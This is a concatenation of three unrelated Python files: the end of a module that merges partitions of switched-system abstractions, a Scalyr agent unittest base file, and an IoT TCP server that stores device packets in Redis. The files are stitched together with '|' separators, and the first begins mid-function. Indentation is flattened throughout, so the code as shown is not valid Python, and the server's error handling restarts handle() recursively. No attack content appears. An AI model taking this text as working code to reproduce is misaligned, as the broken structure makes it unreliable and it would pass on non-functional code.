merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def plot_mode_partitions(swab, show_ts, only_adjacent):
"""Save each mode's partition and final merged partition.
"""
axs = swab.plot(show_ts, only_adjacent)
if not axs:
logger.error('failed to plot the partitions.')
return
n = len(swab.modes)
assert(len(axs) == 2*n)
# annotate
for ax in axs:
plot_annot(ax)
    # save merged-partition views (one per mode)
for ax, mode in zip(axs[:n], swab.modes):
fname = 'merged_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
    # save each mode's own partition
for ax, mode in zip(axs[n:], swab.modes):
fname = 'part_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
def plot_annot(ax):
fontsize = 5
for tick in ax.xaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
for tick in ax.yaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
ax.set_xlabel('$v_1$', fontsize=fontsize+6)
ax.set_ylabel('$v_2$', fontsize=fontsize+6)
def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums):
"""Construct merged transitions.
@type merged_abstr: L{AbstractSwitched}
@type abstr: dict of L{AbstractPwa}
"""
# TODO: check equality of atomic proposition sets
aps = abstr[modes[0]].ts.atomic_propositions
logger.info('APs: ' + str(aps))
sys_ts = trs.FTS()
    # create states
n = len(merged_abstr.ppp)
states = range(n)
sys_ts.states.add_from(states)
sys_ts.atomic_propositions.add_from(aps)
# copy AP labels from regions to discrete states
ppp2ts = states
for (i, state) in enumerate(ppp2ts):
props = merged_abstr.ppp[i].props
sys_ts.states[state]['ap'] = props
# create mode actions
sys_actions = [str(s) for e,s in modes]
env_actions = [str(e) for e,s in modes]
# no env actions ?
if mode_nums[0] == 0:
actions_per_mode = {
(e,s):{'sys_actions':str(s)}
for e,s in modes
}
sys_ts.sys_actions.add_from(sys_actions)
elif mode_nums[1] == 0:
# no sys actions
actions_per_mode = {
(e,s):{'env_actions':str(e)}
for e,s in modes
}
sys_ts.env_actions.add_from(env_actions)
else:
actions_per_mode = {
(e,s):{'env_actions':str(e), 'sys_actions':str(s)}
for e,s in modes
}
sys_ts.env_actions.add_from([str(e) for e,s in modes])
sys_ts.sys_actions.add_from([str(s) for e,s in modes])
for mode in modes:
env_sys_actions = actions_per_mode[mode]
adj = trans[mode]
sys_ts.transitions.add_adj(
adj = adj,
adj2states = states,
**env_sys_actions
)
merged_abstr.ts = sys_ts
merged_abstr.ppp2ts = ppp2ts
def get_transitions(
abstract_sys, mode, ssys, N=10,
closed_loop=True,
trans_length=1
):
"""Find which transitions are feasible in given mode.
Used for the candidate transitions of the merged partition.
@rtype: scipy.sparse.lil_matrix
"""
logger.info('checking which transitions remain feasible after merging')
part = abstract_sys.ppp
# Initialize matrix for pairs to check
IJ = part.adj.copy()
if trans_length > 1:
k = 1
while k < trans_length:
IJ = np.dot(IJ, part.adj)
k += 1
IJ = (IJ > 0).astype(int)
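    # At this point IJ marks the ordered region pairs reachable within at most
    # `trans_length` adjacency hops; only these candidate transitions are
    # checked for feasibility below.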
# Initialize output
n = len(part)
transitions = sp.lil_matrix((n, n), dtype=int)
# Do the abstraction
n_checked = 0
n_found = 0
while np.sum(IJ) > 0:
n_checked += 1
ind = np.nonzero(IJ)
i = ind[1][0]
j = ind[0][0]
IJ[j,i] = 0
logger.debug('checking transition: ' + str(i) + ' -> ' + str(j))
si = part[i]
sj = part[j]
# Use original cell as trans_set
trans_set = abstract_sys.ppp2pwa(mode, i)[1]
active_subsystem = abstract_sys.ppp2sys(mode, i)[1]
trans_feasible = is_feasible(
si, sj, active_subsystem, N,
closed_loop = closed_loop,
trans_set = trans_set
)
if trans_feasible:
transitions[i, j] = 1
msg = '\t Feasible transition.'
n_found += 1
else:
transitions[i, j] = 0
msg = '\t Not feasible transition.'
logger.debug(msg)
logger.info('Checked: ' + str(n_checked))
logger.info('Found: ' + str(n_found))
    assert n_checked != 0, 'would divide by zero'
    logger.info('Survived merging: ' + str(100.0 * n_found / n_checked) + ' %')
return transitions
def multiproc_merge_partitions(abstractions):
"""LOGTIME in #processors parallel merging.
Assuming sufficient number of processors.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
def merge_partitions(abstractions):
"""Merge multiple abstractions.
@param abstractions: keyed by mode
@type abstractions: dict of L{AbstractPwa}
@return: (merged_abstraction, ap_labeling)
where:
- merged_abstraction: L{AbstractSwitched}
- ap_labeling: dict
"""
if len(abstractions) == 0:
warnings.warn('Abstractions empty, nothing to merge.')
return
# consistency check
for ab1 in abstractions.values():
for ab2 in abstractions.values():
p1 = ab1.ppp
p2 = ab2.ppp
if p1.prop_regions != p2.prop_regions:
msg = 'merge: partitions have different sets '
msg += 'of continuous propositions'
raise Exception(msg)
if not (p1.domain.A == p2.domain.A).all() or \
not (p1.domain.b == p2.domain.b).all():
raise Exception('merge: partitions have different domains')
# check equality of original PPP partitions
if ab1.orig_ppp == ab2.orig_ppp:
logger.info('original partitions happen to be equal')
init_mode = list(abstractions.keys())[0]
all_modes = set(abstractions)
remaining_modes = all_modes.difference(set([init_mode]))
print('init mode: ' + str(init_mode))
print('all modes: ' + str(all_modes))
print('remaining modes: ' + str(remaining_modes))
# initialize iteration data
prev_modes = [init_mode]
# Create a list of merged-together regions
ab0 = abstractions[init_mode]
regions = list(ab0.ppp)
parents = {init_mode:list(range(len(regions) ))}
ap_labeling = {i:reg.props for i,reg in enumerate(regions)}
for cur_mode in remaining_modes:
ab2 = abstractions[cur_mode]
r = merge_partition_pair(
regions, ab2, cur_mode, prev_modes,
parents, ap_labeling
)
regions, parents, ap_labeling = r
prev_modes += [cur_mode]
new_list = regions
# build adjacency based on spatial adjacencies of
# component abstractions.
# which justifies the assumed symmetry of part1.adj, part2.adj
# Basically, if two regions are either 1) part of the same region in one of
# the abstractions or 2) adjacent in one of the abstractions, then the two
# regions are adjacent in the switched dynamics.
n_reg = len(new_list)
adj = np.zeros([n_reg, n_reg], dtype=int)
for i, reg_i in enumerate(new_list):
for j, reg_j in enumerate(new_list[0:i]):
touching = False
for mode in abstractions:
pi = parents[mode][i]
pj = parents[mode][j]
part = abstractions[mode].ppp
if (part.adj[pi, pj] == 1) or (pi == pj):
touching = True
break
if not touching:
continue
if pc.is_adjacent(reg_i, reg_j):
adj[i,j] = 1
adj[j,i] = 1
adj[i,i] = 1
ppp = PropPreservingPartition(
domain=ab0.ppp.domain,
regions=new_list,
prop_regions=ab0.ppp.prop_regions,
adj=adj
)
abstraction = AbstractSwitched(
ppp=ppp,
modes=abstractions,
ppp2modes=parents,
)
return (abstraction, ap_labeling)
def merge_partition_pair(
old_regions, ab2,
cur_mode, prev_modes,
old_parents, old_ap_labeling
):
"""Merge an Abstraction with the current partition iterate.
@param old_regions: A list of C{Region} that is from either:
1. The ppp of the first (initial) L{AbstractPwa} to be merged.
2. A list of already-merged regions
@type old_regions: list of C{Region}
@param ab2: Abstracted piecewise affine dynamics to be merged into the
@type ab2: L{AbstractPwa}
@param cur_mode: mode to be merged
@type cur_mode: tuple
@param prev_modes: list of modes that have already been merged together
@type prev_modes: list of tuple
@param old_parents: dict of modes that have already been merged to dict of
indices of new regions to indices of regions
@type old_parents: dict of modes to list of region indices in list
C{old_regions} or dict of region indices to regions in original ppp for
that mode
@param old_ap_labeling: dict of states of already-merged modes to sets of
propositions for each state
@type old_ap_labeling: dict of tuples to sets
@return: the following:
- C{new_list}, list of new regions
- C{parents}, same as input param C{old_parents}, except that it
includes the mode that was just merged and for list of regions in
return value C{new_list}
- C{ap_labeling}, same as input param C{old_ap_labeling}, except that it
includes the mode that was just merged.
"""
logger.info('merging partitions')
part2 = ab2.ppp
modes = prev_modes + [cur_mode]
new_list = []
parents = {mode:dict() for mode in modes}
ap_labeling = dict()
for i in range(len(old_regions)):
for j in range(len(part2)):
isect = pc.intersect(old_regions[i],
part2[j])
rc, xc = pc.cheby_ball(isect)
# no intersection ?
if rc < 1e-5:
continue
logger.info('merging region: A' + str(i) +
', with: B' + str(j))
# if Polytope, make it Region
if len(isect) == 0:
isect = pc.Region([isect])
# label the Region with propositions
isect.props = old_regions[i].props.copy()
new_list.append(isect)
idx = new_list.index(isect)
# keep track of parents
for mode in prev_modes:
parents[mode][idx] = old_parents[mode][i]
parents[cur_mode][idx] = j
# union of AP labels from parent states
ap_label_1 = old_ap_labeling[i]
ap_label_2 = ab2.ts.states[j]['ap']
logger.debug('AP label 1: ' + str(ap_label_1))
logger.debug('AP label 2: ' + str(ap_label_2))
# original partitions may be different if pwa_partition used
# but must originate from same initial partition,
# i.e., have same continuous propositions, checked above
#
# so no two intersecting regions can have different AP labels,
# checked here
if ap_label_1 != ap_label_2:
msg = 'Inconsistent AP labels between intersecting regions\n'
msg += 'of partitions of switched system.'
raise Exception(msg)
ap_labeling[idx] = ap_label_1
return new_list, parents, ap_labeling
|
test_base.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
import sys
import threading
import time
import unittest
import scalyr_agent.scalyr_logging as scalyr_logging
from scalyr_agent.util import StoppableThread
PYTHON_26_OR_OLDER = sys.version_info[:2] < (2, 7)
def _noop_skip(reason):
def decorator(test_func_or_obj):
if not isinstance(test_func_or_obj, type):
def skip_wrapper(*args, **kwargs):
print('Skipping test %s. Reason: "%s"' % (test_func_or_obj.__name__, reason))
return skip_wrapper
else:
test_func_or_obj.__unittest_skip__ = True
test_func_or_obj.__unittest_skip_why__ = reason
return test_func_or_obj
return decorator
def _id(obj):
return obj
def _noop_skip_if(condition, reason):
if condition:
return _noop_skip(reason)
return _id
def _noop_skip_unless(condition, reason):
if not condition:
return _noop_skip(reason)
return _id
skip = _noop_skip
if hasattr(unittest, 'skip'):
skip = unittest.skip
skipUnless = _noop_skip_unless
if hasattr(unittest, 'skipUnless'):
skipUnless = unittest.skipUnless
skipIf = _noop_skip_if
if hasattr(unittest, 'skipIf'):
skipIf = unittest.skipIf
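# Hypothetical usage sketch of the skip shims above (the test class and the
# skipped method are illustrative only):
#
#     class MyAgentTest(ScalyrTestCase):
#         @skipIf(PYTHON_26_OR_OLDER, 'relies on unittest features added in 2.7')
#         def test_something(self):
#             self.assertIsNotNone(object())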
# Global state as to whether or not we've started the thread watcher. We only want one instance of this
# started per entire test suite run.
__thread_watcher_started = False
def _thread_watcher():
"""Used to detect what threads are still alive after the tests should be finished running. In particular, this
helps detect cases where the tests have run successfully but some thread spawned by a test case did not
properly stop. Since it is not a daemon thread, it will block the exit of the entire process.
"""
# Sleep for 60 seconds since our test suites typically run in less than 15 seconds.
time.sleep(60)
# If we are still alive after 60 seconds, it means some test is hung or didn't join
# its threads properly. Let's get some information on them.
    print('Detected hung test run. Active threads are:')
    for t in threading.enumerate():
        print('Active thread %s daemon=%s' % (t.getName(), str(t.isDaemon())))
    print('Done')
def _start_thread_watcher_if_necessary():
"""Starts the thread watcher if it hasn't already been started.
"""
global __thread_watcher_started
if not __thread_watcher_started:
thread = threading.Thread(name='hung thread watcher', target=_thread_watcher)
thread.setDaemon(True)
thread.start()
__thread_watcher_started = True
class BaseScalyrTestCase(unittest.TestCase):
"""Used to define ScalyrTestCase below.
This augments the standard TestCase by capturing all logged lines to stdout and
adds protection to help detect hung test threads.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest', verify_setup_invoked=False):
unittest.TestCase.__init__(self, methodName=methodName)
# Add in some code to check to make sure that derived classed invoked this classes `setUp` method if
# they overrode it.
if verify_setup_invoked:
self.__setup_invoked = False
self.addCleanup(self.verify_setup_invoked)
def setUp(self):
# We need to reset the log destinations here because it is only at this point is stdout replaced with
# whatever object is capturing stdout for this test case.
scalyr_logging.set_log_destination(use_stdout=True)
self.__setup_invoked = True
def run(self, result=None):
_start_thread_watcher_if_necessary()
StoppableThread.set_name_prefix('TestCase %s: ' % str(self))
return unittest.TestCase.run(self, result=result)
def verify_setup_invoked(self):
self.assertTrue(self.__setup_invoked,
msg='Inherited setUp method was not invoked by class derived from ScalyrTestCase')
if sys.version_info[:2] < (2, 7):
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest'):
# Do not verify the setup was invoked since it relies on addCleanup which is only available in 2.7
BaseScalyrTestCase.__init__(self, methodName=methodName, verify_setup_invoked=False)
def assertIs(self, obj1, obj2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if obj1 is not obj2:
if msg is None:
msg = '%s is not %s' % (obj1, obj2)
self.fail(msg)
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if msg is not None:
self.assertTrue(obj is None, msg)
else:
self.assertTrue(obj is None, '%s is not None' % (str(obj)))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if msg is not None:
self.assertTrue(obj is not None, msg)
else:
self.assertTrue(obj is not None, '%s is None' % (str(obj)))
def assertGreater(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a > b, msg)
else:
                self.assertTrue(a > b, '%s is not greater than %s' % (str(a), str(b)))
def assertLess(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a < b, msg)
else:
                self.assertTrue(a < b, '%s is not less than %s' % (str(a), str(b)))
else:
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest'):
BaseScalyrTestCase.__init__(self, methodName=methodName, verify_setup_invoked=True)
def assertIs(self, obj1, obj2, msg=None):
unittest.TestCase.assertIs(self, obj1, obj2, msg=msg)
def assertIsNone(self, obj, msg=None):
unittest.TestCase.assertIsNone(self, obj, msg=msg)
def assertIsNotNone(self, obj, msg=None):
unittest.TestCase.assertIsNotNone(self, obj, msg=msg)
def assertGreater(self, a, b, msg=None):
unittest.TestCase.assertGreater(self, a, b, msg=msg)
def assertLess(self, a, b, msg=None):
unittest.TestCase.assertLess(self, a, b, msg=msg)
|
TCP_Server.py
|
import os
import sys
import logging
import socket as sock
import threading as thrd
import socketserver
import json
import ujson
import datetime as dt
import json
from enum import Enum
#import yaml
import dill
import Redis_DB_Controller as rsdb
from DB.RedisDB_Test_Client import DbNumberSelector
class ForkedTCPServer(socketserver.ForkingMixIn, socketserver.TCPServer):
pass
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class TcpRequestsHandlingMode(Enum):
SINGLETHREADING = 1
MULTITHREADING = 2
class IoTControl:
def __init__(self, name, ctrl_id, type):
self.set(name, ctrl_id, type)
def set(self, name, ctrl_id, type):
self._name = name
self._ctrl_id = ctrl_id
self._type = type
def get(self):
return (self._name, self._ctrl_id, self._type)
class IoTDevice:
def addAllControlsToList(self, controlsListInPack):
for control in controlsListInPack:
self._listOfControls.append(control)
def createFirstChangesPacket(self, helloPack):
self._changesPacket = helloPack["changes_packet"]
def __init__(self, helloPack):
self._devID = helloPack["dev_id"]
self._label = helloPack["label"]
self._listOfControls = list()
self._controlsCount = len(helloPack["controls"])
self.addAllControlsToList(helloPack["controls"])
self._timestamp = dt.datetime.now(tz=None)
self._changesPacket = dict()
self.createFirstChangesPacket(helloPack)
self._devHelloPack = helloPack
def getChangesPackSection(self):
return self._changesPacket
def setChangesPackSection(self, newChangesPack):
self._changesPacket = newChangesPack
def printDeviceInfo(self):
print("Dev_ID: ", self._devID)
print("Label: ", self._label)
print("Controls: ", self._listOfControls)
print("Timestamp: ", self._timestamp)
print("ChangesPackSection: ", self._changesPacket)
class DevicesInfo:
def addIotDevicesToList(self, devices):
for device in devices:
self._devices.append(device)
    def __init__(self, devices=None):
        self._devices = list()
        if devices:
            self.addIotDevicesToList(devices)
def getDevicesList(self):
return self._devices
def setDevicesList(self, devices):
self._devices = devices
def printDevicesData(self):
for device in self._devices:
print(device)
class TcpTransferStatisticsCollector:
pass
class Packet:
def __init__(self, packet):
self._packet = packet
self._packType = packet["type"]
self._timestamp = packet["time_stamp"]
def setPacketData(self, packData, packType, packTimestamp):
self._packet = packData
self._packType = packType
self._timestamp = packTimestamp
def getPacketData(self):
return (self._packType, self._timestamp, self._packet)
def getMainPackData(self):
return (self._packType, self._timestamp)
def getPacket(self):
return self._packet
def setPacket(self, packet):
self._packet = packet
class RequestsHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
#
self.broken_packets_counter = 0
#
self.normal_packets_counter = 0
#
self.transfer_counter = 0
#
self.broken_packets_transfer_stat = 0.0
# db 0 : devices
self._redis = rsdb.RedisDB_Wrapper(0)
# db 1 : packets_from_tcp
self._redis1 = rsdb.RedisDB_Wrapper(1)
# db 2 : packets from ws
self._redis2 = rsdb.RedisDB_Wrapper(2)
# db 3 : all packets
self._redis3 = rsdb.RedisDB_Wrapper(3)
# unique key for rs1
self._rs1_index = 0
# unique key for rs3
self._rs3_index = 0
self.logger = logging.getLogger('RequestHandler')
self.logger.debug('__init__')
socketserver.BaseRequestHandler.__init__(self, request,
client_address,
server)
return
def setup(self):
self.logger.debug('setup')
return socketserver.BaseRequestHandler.setup(self)
def test_packets_recv_from_ESP8266(self, stopSymbol="\r"):
raw_data = self.request.recv(4096)
normPack = raw_data.decode("utf-8")
print(normPack)
# data = ujson.loads(raw_data.decode("ascii"))
# print(data)
# ack = "ok".encode()
# self.request.send(ack)
'''
pack = {"controls": [{"state": "on", "ctrl_id": "adolorumdeleniti"},
{"state": 54, "ctrl_id": "voluptatibuslaboreamet"},
{"state": 75, "ctrl_id": "errorreruma"}, {"state": 4034, "ctrl_id": "quosquoddistinctio"},
{"state": "on", "ctrl_id": "necessitatibusdolorlaboriosam"}], "type": "dev_changes",
"dev_id": "209.154.213.252", "time_stamp": 1270305449}
'''
pack = {"status": "ok"}
raw_data = (ujson.dumps(pack, ensure_ascii=False) + stopSymbol).encode("utf-8")
# raw_data = pack.encode("utf-8")
# raw_data = ujson.dumps(pack).encode("ascii")
self.request.send(raw_data)
def updateDataInRSDB(self, packet):
if packet["type"] == "dev_hello":
key = packet["dev_id"]
print("Cur Key = ", key)
iot_dev = IoTDevice(packet)
self._redis.addObjectToDB(key, iot_dev)
iotDev = self._redis.getObject(key)
            iotDev.printDeviceInfo()
if packet["type"] == "dev_changes":
key = packet["dev_id"]
iotDev = self._redis.getObject(key)
if iotDev is not None:
iotDev.setChangesPackSection(packet)
self._redis.addObjectToDB(key, iotDev)
                iotDev.printDeviceInfo()
def addPacketToDB1(self, packet, isComplexObject=True):
if isComplexObject:
pack = Packet(packet)
#dill.detect.errors(pack)
self._redis1.addObjectToDB(str(self._rs1_index), pack)
else:
self._redis1.addRecordToDB(str(self._rs1_index), packet)
self._rs1_index += 1
def addPacketToDB3(self, packet, isComplexObject=True):
if isComplexObject:
pack = Packet(packet)
dill.detect.errors(pack)
self._redis3.addObjectToDB(str(self._rs3_index), pack)
else:
self._redis3.addRecordToDB(str(self._rs3_index), packet)
self._rs3_index += 1
'''
db0 : devices
db1 : current packets from tcp-socket
db2 : current packets from ws
db3 : all packets
'''
def dbMonitoring(self, dbNumber):
if dbNumber == DbNumberSelector.REDIS_DB_0:
return self._redis.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_1:
return self._redis1.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_2:
return self._redis2.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_3:
return self._redis3.isRedisServerAvailable()
def readAllPacketsFromDB2(self, isComplexObject=True):
keys = self._redis2.getAllKeys()
packets = list()
#if keys is not None:
if len(keys) > 0:
for key in keys:
if isComplexObject:
packet = self._redis2.getObject(key)
else:
packet = self._redis2.getRecord(key)
packets.append(packet)
return packets
else:
#return None
print("Keys list of RSDB #2 is empty!")
return packets
def isPacketsExists(self, packets):
#if packets is not None:
if len(packets) > 0:
return True
else:
return False
def sendPacketsFromWS(self, packets):
for pack in packets:
#raw_data = (ujson.dumps(pack, ensure_ascii=False) + "\r").encode("utf-8")
raw_data = (ujson.dumps(pack, ensure_ascii=False)).encode("utf-8")
self.request.send(raw_data)
def clearDB2(self):
self._redis2.delDataFromCurDB()
def printPacket(self, packet):
print("Pack Type: ", packet["type"])
print("Pack:")
print(packet)
def printPacketInNormalView(self, parsedPacket):
print(json.dumps(parsedPacket, indent=4, sort_keys=True))
def jsonPackSerialize(self, packet):
# return ujson.dumps(pack, ensure_ascii=False).encode("utf-8")
return json.dumps(packet, ensure_ascii=False).encode("utf-8")
def jsonPackDeserialize(self, raw_data):
# return ujson.loads(raw_data.decode("utf-8"))
return json.loads(raw_data.decode("utf-8"))
def sendAckPacket(self):
ack = "ok".encode()
self.request.send(ack)
def packets_recv(self):
#for i in range(0, 9):
self.transfer_counter += 1
#
self.printCurThreadInfo()
while True:
# Receive hello pack from the client
raw_data = self.request.recv(8196)
#print(raw_data.decode("utf-8"))
# pack deserialize
packet = self.jsonPackDeserialize(raw_data)
# update changes section in iot_dev objects
#self.updateDataInRSDB(packet)
# save packet to DB1
self.addPacketToDB1(packet)
# read packets from DB2
packets = self.readAllPacketsFromDB2()
# check up the packets in DB2
if self.isPacketsExists(packets):
# send packets from DB2 to tcp client
self.sendPacketsFromWS(packets)
# clear DB2
self.clearDB2()
# save packet to DB3
self.addPacketToDB3(packet)
'''
if packet["type"] == "dev_hello":
print("DEV_HELLO")
if packet["type"] == "dev_changes":
print("DATA")
'''
#data = ujson.loads(raw_data.decode())
#data = raw_data.decode("utf-8")
#self.logger.debug('recv()-> "%s"', data)
self.printPacketInNormalView(packet)
# send ack
self.sendAckPacket()
# successful transfer
self.normal_packets_counter += 1
    def relaunchHandling(self, e):
self.broken_packets_counter += 1
#self.broken_packets_transfer_stat = (self.broken_packets_counter / self.transfer_counter) * 100
self.broken_packets_transfer_stat = (1 - (self.normal_packets_counter / self.transfer_counter)) * 100
print("DEBUG: broken_packets_transfer_statistics = ", self.broken_packets_transfer_stat, "%")
print("LOG: TCP_SERVER Time: ",
dt.datetime.now(tz=None), " Error_Msg: ", e)
self.handle()
def transferDataFromDIDS(self):
self.logger.debug('handle')
#
#self.transfer_counter += 1
#
try:
self.packets_recv()
# except (simplejson.decoder.JSONDecodeError, json.decoder.JSONDecodeError) as e:
except ValueError as e:
self.broken_packets_counter += 1
# self.broken_packets_transfer_stat = (self.broken_packets_counter / self.transfer_counter) * 100
self.broken_packets_transfer_stat = (1 - (self.normal_packets_counter / self.transfer_counter)) * 100
print("DEBUG: broken_packets_transfer_statistics = ", self.broken_packets_transfer_stat, "%")
print("LOG: TCP_SERVER (tcp_server_crashed_counter = ", self.broken_packets_counter, " Time: ",
dt.datetime.now(tz=None), " Error_Msg: ", e)
self.handle()
except (ConnectionAbortedError, ConnectionResetError) as e:
            #self.relaunchHandling(e)
pass
except Exception as e:
            self.relaunchHandling(e)
'''
def addClientToClientsList(self):
print("recv data from client: ", self.client_address)
'''
def launchClientHandling(self):
# add client to list
#self.addClientToClientsList()
# transfer data from distribution iot-devices system
self.transferDataFromDIDS()
def printCurThreadInfo(self):
curThread = thrd.currentThread()
print("Name of current thread", curThread.getName())
def handle(self):
# Start client handling in a thread
#t = thrd.Thread(target=self.launchClientHandling, args=(self,))
# t.setDaemon(True) # don't hang on exit
#t.start()
#
self.printCurThreadInfo()
#
self.launchClientHandling()
return
def finish(self):
self.logger.debug('finish')
return socketserver.BaseRequestHandler.finish(self)
#class TCPServer(socketserver.TCPServer, SocketServer.ForkingMixIn):
class TCPServer(socketserver.TCPServer, socketserver.ThreadingMixIn):
#class TCPServer(socketserver.TCPServer):
def __init__(self, server_address,
handler_class=RequestsHandler,
):
self.logger = logging.getLogger('TCP_Server')
self.logger.debug('__init__')
socketserver.TCPServer.__init__(self, server_address,
handler_class)
#
self._clients = dict()
#
self._clientsCount = 0
#
#self._handlingMode = TcpRequestsHandlingMode.SINGLETHREADING
self._handlingMode = TcpRequestsHandlingMode.MULTITHREADING
return
def getClientsList(self):
return self._clients
def setClientsList(self, clients):
self._clients = clients
def add_client(self, network_addr, con_sock):
# add client ( net_addr : list(socket, thread, datetime) )
incomingTime = dt.datetime.now()
self._clients.update({network_addr: [con_sock, None, incomingTime]})
        # refresh count of clients
self._clientsCount = len(self._clients)
print("---------------------------------------------------")
print("add new client --- NetAddr: ", network_addr, " (Sock: ", con_sock, " , Descriptor of thread: ", None,
", client connecting time: ", incomingTime,
")")
print("---------------------------------------------------")
def printClientsList(self):
print("Clients count: ", self._clientsCount)
print("Clients list:")
for client in self._clients:
#print("NetAddr: ", client, " ClientCntx: sock = ", self._clients[client][0], " thread_desc = ", self._clients[client][1])
print("NetAddr: ", client, " ClientCntx: sock = ", self._clients[client][0])
print(" thread_desc = ", self._clients[client][1])
print(" client connecting time = ", self._clients[client][2])
'''
Called by the server’s constructor to bind the socket to the desired address. May be overridden.
'''
def server_bind(self):
self.logger.debug('server_bind')
socketserver.TCPServer.server_bind(self)
return
'''
Called by the server’s constructor to activate the server. The default behavior for a TCP server just invokes
listen() on the server’s socket. May be overridden.
'''
def server_activate(self):
self.logger.debug('server_activate')
socketserver.TCPServer.server_activate(self)
return
'''
Return an integer file descriptor for the socket on which the server is listening. This function is most commonly
passed to selectors, to allow monitoring multiple servers in the same process.
'''
def fileno(self):
self.logger.debug('fileno')
return socketserver.TCPServer.fileno(self)
'''
This is called in the serve_forever() loop. This method can be overridden by subclasses or mixin classes to
perform actions specific to a given service, such as cleanup actions.
'''
def service_actions(self):
# call each second (should use for redis db check up)
        self.logger.debug('service_actions')
# printing clients list
self.printClientsList()
socketserver.TCPServer.service_actions(self)
return
'''
Handle requests until an explicit shutdown() request. Poll for shutdown every poll_interval seconds. Ignores
the timeout attribute. It also calls service_actions(), which may be used by a subclass or mixin to provide
actions specific to a given service. For example, the ForkingMixIn class uses service_actions() to clean up
zombie child processes.
'''
def serve_forever(self, poll_interval=0.5):
self.logger.debug('waiting for request')
self.logger.info(
'Handling requests, press <Ctrl-C> to quit'
)
socketserver.TCPServer.serve_forever(self, poll_interval)
return
'''
Process a single request. This function calls the following methods in order: get_request(), verify_request(),
and process_request(). If the user-provided handle() method of the handler class raises an exception, the
server’s handle_error() method will be called. If no request is received within timeout seconds, handle_timeout()
will be called and handle_request() will return.
'''
def handle_request(self):
self.logger.debug('handle_request')
return socketserver.TCPServer.handle_request(self)
'''
This function is called if the handle() method of a RequestHandlerClass instance raises an exception. The default
action is to print the traceback to standard output and continue handling further requests.
'''
def handle_error(self, request, client_address):
self.logger.debug('handle_error')
return socketserver.TCPServer.handle_error(self, request, client_address)
'''
This function is called when the timeout attribute has been set to a value other than None and the timeout period
has passed with no requests being received. The default action for forking servers is to collect the status of any
child processes that have exited, while in threading servers this method does nothing.
'''
def handle_timeout(self):
#self.logger.debug('handle_timeout')
pass
'''
Must accept a request from the socket, and return a 2-tuple containing the new socket object to be used to
communicate with the client, and the client’s address.
'''
def get_request(self):
self.logger.debug('get request')
return socketserver.TCPServer.get_request(self)
#return
'''
Must return a Boolean value; if the value is True, the request will be processed, and if it’s False, the request
will be denied. This function can be overridden to implement access controls for a server. The default
implementation always returns True.
'''
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)',
request, client_address)
#
print("client_address = ", client_address)
self.add_client(client_address, request)
return socketserver.TCPServer.verify_request(
self, request, client_address,
)
def process_request_thread(self, request, client_address):
pass
def process_request_multithreading(self, request, client_address):
print("multithreading requests handling")
t = thrd.Thread(target=socketserver.TCPServer.process_request, args=(self, request, client_address,))
# add descriptor of thread
self._clients[client_address][1] = t
return t.start()
#return t
def process_request_singlethreading(self, request, client_address):
return socketserver.TCPServer.process_request(
self, request, client_address,
)
'''
Calls finish_request() to create an instance of the RequestHandlerClass. If desired, this function can create
a new process or thread to handle the request; the ForkingMixIn and ThreadingMixIn classes do this.
'''
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)',
request, client_address)
#self.add_client(client_address, request)
if self._handlingMode == TcpRequestsHandlingMode.SINGLETHREADING:
return self.process_request_singlethreading(request, client_address)
else:
return self.process_request_multithreading(request, client_address)
'''
Clean up the server. May be overridden.
'''
def server_close(self):
self.logger.debug('server_close')
return socketserver.TCPServer.server_close(self)
'''
delete client from general client's list by ipv4 address
'''
def del_client(self, request_address):
# get thread descriptor
#t = self._clients[request_address][1]
# thread shutdown
#t.join()
#print("close thread for client: ", request_address)
#self._clients[request_address][1].join()
# delete client
del self._clients[request_address]
outcomingTime = dt.datetime.now()
print("[", outcomingTime, "] client with address [", request_address, "] was deleted from list")
'''
delete client from general client's list by socket descriptor
'''
def del_client_by_sock(self, sockDesc):
try:
for key, value in self._clients.items():
if value[0] == sockDesc:
print("closing socket: ", value[0], " and shutdown the thread: ", value[1])
# get thread descriptor
#t = value[1]
# thread shutdown
#t.join()
print("client with address [", key, "] was deleted from list")
del self._clients[key]
# update the size of client's list
self._clientsCount = len(self._clients)
#
#print("client with address [IPv4: ", key1, " port: ", key2, "] was deleted from list")
except RuntimeError as e:
print(e)
'''
